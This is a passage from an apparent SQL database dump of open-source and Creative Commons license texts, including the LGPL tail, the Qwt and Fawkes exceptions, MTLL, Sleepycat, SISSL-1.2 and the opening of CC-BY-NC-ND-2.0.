QUALITY AND PERFORMANCE\nOF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME\nTHE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE\nTHE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE\nOR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA\nOR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES\nOR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH\nHOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\nEND OF TERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Libraries\n\nIf you develop a new library, and you want it to be of the greatest possible\nuse to the public, we recommend making it free software that everyone can\nredistribute and change. You can do so by permitting redistribution under\nthese terms (or, alternatively, under the terms of the ordinary General Public\nLicense).\n\nTo apply these terms, attach the following notices to the library. It is safest\nto attach them to the start of each source file to most effectively convey\nthe exclusion of warranty; and each file should have at least the \"copyright\"\nline and a pointer to where the full notice is found.\n\none line to give the library\'s name and an idea of what it does.\n\nCopyright (C) year name of author\n\nThis library is free software; you can redistribute it and/or modify it under\nthe terms of the GNU Library General Public License as published by the Free\nSoftware Foundation; either version 2 of the License, or (at your option)\nany later version.\n\nThis library is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Library General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Library General Public License\nalong with this library; if not, write to the Free Software Foundation, Inc.,\n51 Franklin St, Fifth Floor, Boston, MA 02110-1301, USA.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nYou should also get your employer (if you work as a programmer) or your school,\nif any, to sign a \"copyright disclaimer\" for the library, if necessary. Here\nis a sample; alter the names:\n\nYoyodyne, Inc., hereby disclaims all copyright interest in\n\nthe library `Frob\' (a library for tweaking knobs) written\n\nby James Random Hacker.\n\nsignature of Ty Coon, 1 April 1990\n\nTy Coon, President of Vice\n\nThat\'s all there is to it!\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(114,'Qwt-exception-1.0','Qwt License Version 1.0,\n\nJanuary 1, 2003\n\nThe Qwt library and included programs are provided under the terms of the GNU LESSER GENERAL PUBLIC LICENSE (LGPL) with the following exceptions:\n\n 1. Widgets that are subclassed from Qwt widgets do not constitute a derivative work.\n\n 2. Static linking of applications and widgets to the Qwt library does not constitute a derivative work and does not require the author to provide source code for the application or widget, use the shared Qwt libraries, or link their applications or widgets against a user-supplied version of Qwt. If you link the application or widget to a modified version of Qwt, then the changes to Qwt must be provided under the terms of the LGPL in sections 1, 2, and 4.\n\n 3. You do not have to provide a copy of the Qwt license with programs that are linked to the Qwt library, nor do you have to identify the Qwt license in your program or documentation as required by section 6 of the LGPL.\n\nHowever, programs must still identify their use of Qwt. The following example statement can be included in user documentation to satisfy this requirement: [program/widget] is based in part on the work of the Qwt project (http://qwt.sf.net).\"\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(115,'Fawkes-Runtime-exception','Linking this library statically or dynamically with other modules is making a combined work based on this library. Thus, the terms and conditions of the GNU General Public License cover the whole combination. As a special exception, the copyright holders of this library give you permission to link this library with independent modules to produce an executable, regardless of the license terms of these independent modules, and to copy and distribute the resulting executable under terms of your choice, provided that you also meet, for each linked independent module, the terms and conditions of the license of that module. An independent module is a module which is not derived from or based on this library. If you modify this library, you may extend this exception to your version of the library, but you are not obligated to do so. If you do not wish to do so, delete this exception statement from your version. Additionally if other files instantiate templates or use macros or inline functions from this file, or you compile this file and link it with other files to produce an executable, this file does not by itself cause the resulting executable to be covered by the GNU General Public License. This exception does not however invalidate any other reasons why the executable file might be covered by the GNU General Public License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(116,'MTLL','Software License for MTL\n\nCopyright (c) 2007 The Trustees of Indiana University.\n\n2008 Dresden University of Technology and the Trustees of Indiana University.\n\n2010 SimuNova UG (haftungsbeschränkt), www.simunova.com.\n\nAll rights reserved.\n\nAuthors: Peter Gottschling and Andrew Lumsdaine\n\nThis file is part of the Matrix Template Library\n\nDresden University of Technology -- short TUD -- and Indiana University --\nshort IU -- have the exclusive rights to license this product under the following\nlicense.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. All redistributions of source code must retain the above copyright notice,\nthe list of authors in the original source code, this list of conditions and\nthe disclaimer listed in this license;\n\n2. All redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the disclaimer listed in this license in the documentation\nand/or other materials provided with the distribution;\n\n3. Any documentation included with all redistributions must include the following\nacknowledgement:\n\n\"This product includes software developed at the University of Notre Dame,\nthe Pervasive Technology Labs at Indiana University, and Dresden University\nof Technology. For technical information contact Andrew Lumsdaine at the Pervasive\nTechnology Labs at Indiana University. For administrative and license questions\ncontact the Advanced Research and Technology Institute at 1100 Waterway Blvd.\nIndianapolis, Indiana 46202, phone 317-274-5905, fax 317-274-5902.\"\n\nAlternatively, this acknowledgement may appear in the software itself, and\nwherever such third-party acknowledgments normally appear.\n\n4. The name \"MTL\" shall not be used to endorse or promote products derived\nfrom this software without prior written permission from IU or TUD. For written\npermission, please contact Indiana University Advanced Research & Technology\nInstitute.\n\n5. Products derived from this software may not be called \"MTL\", nor may \"MTL\"\nappear in their name, without prior written permission of Indiana University\nAdvanced Research & Technology Institute.\n\nTUD and IU provide no reassurances that the source code provided does not\ninfringe the patent or any other intellectual property rights of any other\nentity. TUD and IU disclaim any liability to any recipient for claims brought\nby any other entity based on infringement of intellectual property rights\nor otherwise.\n\nLICENSEE UNDERSTANDS THAT SOFTWARE IS PROVIDED \"AS IS\" FOR WHICH NO WARRANTIES\nAS TO CAPABILITIES OR ACCURACY ARE MADE. DRESDEN UNIVERSITY OF TECHNOLOGY\nAND INDIANA UNIVERSITY GIVE NO WARRANTIES AND MAKE NO REPRESENTATION THAT\nSOFTWARE IS FREE OF INFRINGEMENT OF THIRD PARTY PATENT, COPYRIGHT, OR OTHER\nPROPRIETARY RIGHTS. DRESDEN UNIVERSITY OF TECHNOLOGY AND INDIANA UNIVERSITY\nMAKE NO WARRANTIES THAT SOFTWARE IS FREE FROM \"BUGS\", \"VIRUSES\", \"TROJAN HORSES\",\n\"TRAP DOORS\", \"WORMS\", OR OTHER HARMFUL CODE. LICENSEE ASSUMES THE ENTIRE\nRISK AS TO THE PERFORMANCE OF SOFTWARE AND/OR ASSOCIATED MATERIALS, AND TO\nTHE PERFORMANCE AND VALIDITY OF INFORMATION GENERATED USING SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(117,'Sleepycat','The Sleepycat License Copyright (c) 1990-1999 Sleepycat Software. All rights\nreserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n- Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n- Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n- Redistributions in any form must be accompanied by information on how to\nobtain complete source code for the DB software and any accompanying software\nthat uses the DB software. The source code must either be included in the\ndistribution or be available for no more than the cost of distribution plus\na nominal fee, and must be freely redistributable under reasonable conditions.\nFor an executable file, complete source code means the source code for all\nmodules it contains. It does not include source code for modules or files\nthat typically accompany the major components of the operating system on which\nthe executable file runs.\n\nTHIS SOFTWARE IS PROVIDED BY SLEEPYCAT SOFTWARE ``AS IS\'\' AND ANY EXPRESS\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT,\nARE DISCLAIMED. IN NO EVENT SHALL SLEEPYCAT SOFTWARE BE LIABLE FOR ANY DIRECT,\nINDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\nBUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\nOF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nCopyright (c) 1990, 1993, 1994, 1995 The Regents of the University of California.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n- Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n- Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n- Neither the name of the University nor the names of its contributors may\nbe used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS\'\' AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\nIN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nCopyright (c) 1995, 1996 The President and Fellows of Harvard University.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n- Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n- Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n- Neither the name of the University nor the names of its contributors may\nbe used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY HARVARD AND ITS CONTRIBUTORS ``AS IS\'\' AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\nIN NO EVENT SHALL HARVARD OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(118,'SISSL-1.2','\n\nSUN INDUSTRY STANDARDS SOURCE LICENSE\n\nVersion 1.2\n\n 1.0 DEFINITIONS\n\n1.1 Commercial Use means distribution or otherwise making the Original Code\navailable to a third party.\n\n1.2 Contributor Version means the combination of the Original Code, and the\nModifications made by that particular Contributor.\n\n1.3 Electronic Distribution Mechanism means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.4 Executable means Original Code in any form other than Source Code.\n\n1.5 Initial Developer means the individual or entity identified as the Initial\nDeveloper in the Source Code notice required by Exhibit A.\n\n1.6 Larger Work means a work which combines Original Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.7 License means this document.\n\n1.8 Licensable means having the right to grant, to the maximum extent possible,\nwhether at the time of the initial grant or subsequently acquired, any and\nall of the rights conveyed herein.\n\n1.9 Modifications means any addition to or deletion from the substance or\nstructure of either the Original Code or any previous Modifications. A Modification\nis:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10 Original Code means Source Code of computer software code which is described\nin the Source Code notice required by Exhibit A as Original Code.\n\n1.11 Patent Claims means any patent claim(s), now owned or hereafter acquired,\nincluding without limitation, method, process, and apparatus claims, in any\npatent Licensable by grantor.\n\n1.12 Source Code means the preferred form of the Original Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, or scripts used to control compilation and installation\nof an Executable.\n\n 1.13 Standards means the standards identified in Exhibit B.\n\n1.14 You (or Your) means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, You includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, control means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2.0 SOURCE CODE LICENSE\n\n2.1 The Initial Developer Grant The Initial Developer hereby grants You a\nworld-wide, royalty-free, non-exclusive license, subject to third party intellectual\nproperty claims:\n\n \n\n(a)under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices,\nincluding but not limited to Modifications.\n\n 3.0 DISTRIBUTION OBLIGATIONS\n\n3.1 Application of License. The Source Code version of Original Code may be\ndistributed only under the terms of this License or a future version of this\nLicense released under Section 6.1, and You must include a copy of this License\nwith every copy of the Source Code You distribute. You may not offer or impose\nany terms on any Source Code version that alters or restricts the applicable\nversion of this License or the recipients rights hereunder. Your license for\nshipment of the Contributor Version is conditioned upon Your full compliance\nwith this Section. The Modifications which You create must comply with all\nrequirements set out by the Standards body in effect one hundred twenty (120)\ndays before You ship the Contributor Version. In the event that the Modifications\ndo not meet such requirements, You agree to publish either (i) any deviation\nfrom the Standards protocol resulting from implementation of Your Modifications\nand a reference implementation of Your Modifications or (ii) Your Modifications\nin Source Code form, and to make any such deviation and reference implementation\nor Modifications available to all third parties under the same terms a this\nlicense on a royalty free basis within thirty (30) days of Your first customer\nshipment of Your Modifications. Additionally, in the event that the Modifications\nyou create do not meet the requirements set out in this Section, You agree\nto comply with the Standards requirements set out in Exhibit B.\n\n3.2 Required Notices. You must duplicate the notice in Exhibit A in each file\nof the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd Your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients rights or ownership rights relating to Initial Code.\n\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Your version of the\nCode. However, You may do so only on Your own behalf, and not on behalf of\nthe Initial Developer. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer for any liability incurred\nby the Initial Developer as a result of warranty, support, indemnity or liability\nterms You offer.\n\n3.3 Distribution of Executable Versions. You may distribute Original Code\nin Executable and Source form only if the requirements of Sections 3.1 and\n3.2 have been met for that Original Code, and if You include a notice stating\nthat the Source Code version of the Original Code is available under the terms\nof this License. The notice must be conspicuously included in any notice in\nan Executable or Source versions, related documentation or collateral in which\nYou describe recipients rights relating to the Original Code. You may distribute\nthe Executable and Source versions of Your version of the Code or ownership\nrights under a license of Your choice, which may contain terms different from\nthis License, provided that You are in compliance with the terms of this License.\nIf You distribute the Executable and Source versions under a different license\nYou must make it absolutely clear that any terms which differ from this License\nare offered by You alone, not by the Initial Developer. You hereby agree to\nindemnify the Initial Developer for any liability incurred by the Initial\nDeveloper as a result of any such terms You offer.\n\n3.4 Larger Works. You may create a Larger Work by combining Original Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Original Code.\n\n 4.0 INABILITY TO COMPLY DUE TO STATUTE OR REGULATION\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Original Code due to statute, judicial\norder, or regulation then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.2 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5.0 APPLICATION OF THIS LICENSE\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Modifications as set out in Section 3.1.\n\n 6.0 VERSIONS OF THE LICENSE\n\n6.1 New Versions. Sun may publish revised and/or new versions of the License\nfrom time to time. Each version will be given a distinguishing version number.\n\n6.2 Effect of New Versions. Once Original Code has been published under a\nparticular version of the License, You may always continue to use it under\nthe terms of that version. You may also choose to use such Original Code under\nthe terms of any subsequent version of the License published by Sun. No one\nother than Sun has the right to modify the terms applicable to Original Code.\n\n 7.0 DISCLAIMER OF WARRANTY\n\nORIGINAL CODE IS PROVIDED UNDER THIS LICENSE ON AN AS IS BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE ORIGINAL CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE ORIGINAL CODE IS WITH YOU. SHOULD ANY ORIGINAL CODE PROVE DEFECTIVE\nIN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER) ASSUME THE COST OF ANY NECESSARY\nSERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN\nESSENTIAL PART OF THIS LICENSE. NO USE OF ANY ORIGINAL CODE IS AUTHORIZED\nHEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8.0 TERMINATION\n\n8.1 This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Original Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive. 8.2 In the event of termination under Section\n8.1 above, all end user license agreements (excluding distributors and resellers)\nwhich have been validly granted by You or any distributor hereunder prior\nto termination shall survive termination. EXHIBIT A - Sun Industry Standards\nSource License\n\n\" The contents of this file are subject to the Sun Industry Standards Source\nLicense Version 1.2 (the License); You\n\nmay not use this file except in compliance with the License. \"\n\n\" You may obtain a copy of the License at gridengine.sunsource.net/license.html\n\"\n\n\" Software distributed under the License is distributed on an AS IS basis,\nWITHOUT WARRANTY OF ANY KIND, either express or\n\nimplied. See the License for the specific language governing rights and limitations\nunder the License. \"\n\n\" The Original Code is Grid Engine. \"\n\n\" The Initial Developer of the Original Code is:\n\nSun Microsystems, Inc. \"\n\n\" Portions created by: Sun Microsystems, Inc. are Copyright (C) 2001 Sun Microsystems,\nInc. \"\n\n\" All Rights Reserved. \"\n\n\" Contributor(s): __________________________________\"\n\nEXHIBIT B - Standards\n\n1.0 Requirements for project Standards. The requirements for project Standards\nare version-dependent and are defined at: Grid Engine standards.\n\n2.0 Additional requirements. The additional requirements pursuant to Section\n3.1 are defined as:\n\n2.1 Naming Conventions. If any of your Modifications do not meet the requirements\nof the Standard, then you must change the product name so that Grid Engine,\ngridengine, gridengine.sunsource, and similar naming conventions are not used.\n\n2.2 Compliance Claims. If any of your Modifications do not meet the requirements\nof the Standards you may not claim, directly or indirectly, that your implementation\nof the Standards is compliant.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(119,'CC-BY-NC-ND-2.0','Creative Commons Attribution-NonCommercial-NoDerivs 2.0 CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\nFor the avoidance of doubt, where the Work is a musical composition or sound\nrecording, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered a Derivative Work for the purpose of\nthis License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\nb. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats,\nbut otherwise you have no rights to make Derivative Works. All rights not\nexpressly granted by Licensor are hereby reserved, including but not limited\nto the rights set forth in Sections 4(d) and 4(e).\n\n4. Restrictions.The license granted in Section 3 above is expressly made subject\nto and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and to the disclaimer\nof warranties. You may not distribute, publicly display, publicly perform,\nor publicly digitally perform the Work with any technological measures that\ncontrol access or use of the Work in a manner inconsistent with the terms\nof this License Agreement. The above applies to the Work as incorporated in\na Collective Work, but this does not require the Collective Work apart from\nthe Work itself to be made subject to the terms of this License. If You create\na Collective Work, upon notice from any Licensor You must, to the extent practicable,\nremove from the Collective Work any reference to such Licensor or the Original\nAuthor, as requested.\n\nb. You may not exercise any of the rights granted to You in Section 3 above\nin any manner that is primarily intended for or directed toward commercial\nadvantage or private monetary compensation. The exchange of the Work for other\ncopyrighted works by means of digital file-sharing or otherwise shall not\nbe considered to be intended for or directed toward commercial advantage or\nprivate monetary compensation, provided there is no payment of any monetary\ncompensation in connection with the exchange of copyrighted works.\n\nc. If you distribute, publicly display, publicly perform, or publicly digitally\nperform the Work, You must keep intact all copyright notices for the Work\nand give the Original Author credit reasonable to the medium or means You\nare utilizing by conveying the name (or pseudonym if applicable) of the Original\nAuthor if supplied; the title of the Work if supplied; and to the extent reasonably\npracticable, the Uniform Resource Identifier, if any, that Licensor specifies\nto be associated with the Work, unless such URI does not refer to the copyright\nnotice or licensing information for the Work. Such credit may be implemented\nin any reasonable manner; provided, however, that in the case of a Collective\nWork, at a minimum such credit will appear where any other comparable authorship\ncredit appears and in a manner at least as prominent as such other comparable\nauthorship credit.\n\n d. For the avoidance of doubt, where the Work is a musical composition:\n\ni. Performancf Royalties Under Blanket Licenses. Licensor reserves the exclusive\nright to collect, whether individually or via a performance rights society\n(e.g. ASCAP, BMI, SESAC), royalties for the public performance or public digital\nperformance (e.g. webcast) of the Work if that performance is primarily intended\nfor or directed toward commercial advantage or private monetary compensation.\n\nii. Mechanical Rights and Statutory Royalties. Licensor reserves the exclusive\nright to collect, whether individually or via a music rights agency or designated\nagent (e.g. Harry Fox Agency), royalties for any phonorecord You create from\nthe Work (\"cover version\") and distribute, subject to the compulsory license\ncreated by 17 USC Section 115 of the US Copyright Act (or the equivalent in\nother jurisdictions), if Your distribution of such cover version is primarily\nintended for or directed toward commercial advantage or private monetary compensation.\n\ne. Webcasting Rights and Statutory Royalties. For the avoidance of doubt,\nwhere the Work is a sound recording, Licensor reserves the exclusive right\nto collect, whether individually or via a performance-rights society (e.g.\nSoundExchange), royalties for the public digital performance (e.g. webcast)\nof the Work, subject to the compulsory license created by 17 USC Section 114\nof the US Copyright Act (or the equivalent in other jurisdictions), if Your\npublic digital performance is primarily intended for or directed toward commercial\nadvantage or private monetary compensation.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Collective Works from You under this License, however, will\nnot have their licenses terminated provided such individuals or entities remain\nin full compliance with those licenses. Sections 1, 2, 5, 6, 7, and 8 will\nsurvive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a 